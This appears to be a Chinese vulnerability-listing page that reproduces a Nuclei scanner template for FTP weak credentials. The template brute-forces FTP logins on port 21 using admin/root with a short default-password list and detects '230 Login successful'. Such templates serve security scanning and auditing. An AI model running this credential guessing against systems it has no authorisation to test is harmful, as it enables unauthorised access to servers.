ftp-weak-credentials: FTP Service - Credential Weakness

日期: 2025-08-01 | 影响软件: ftp | POC: 已公开

漏洞描述

An FTP service was accessed with easily guessed credentials.

PoC代码[已公开]

id: ftp-weak-credentials

info:
  name: FTP Service - Credential Weakness
  author: pussycat0x,h3h3qaq
  severity: high
  description: An FTP service was accessed with easily guessed credentials.
  reference:
    - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 8.5
  metadata:
    max-request: 1
  tags: network,ftp,default-login,service,tcp,vuln

tcp:

  - inputs:
      - data: "USER {{username}}\r\n"
        read: 8
      - data: "PASS {{password}}\r\n"
        read: 8

    host:
      - "{{Hostname}}"
    port: 21

    attack: clusterbomb
    payloads:
      username:
        - admin
        - root
      password:
        - password
        - toor
        - nas
        - guest
        - default
        - pass1
        - stingray

    matchers:
      - type: word
        words:
          - "230 Login successful"
# digest: 490a0046304402206ab021691dc0adc92f107b5890983306c086c7e9d815c691edd02dbd7b0166e7022014c61fcd139c62a17157ea63f4c68047ab52783f78d7fc668ddd71cf8771097f:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/network/default-login/ftp-weak-credentials.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐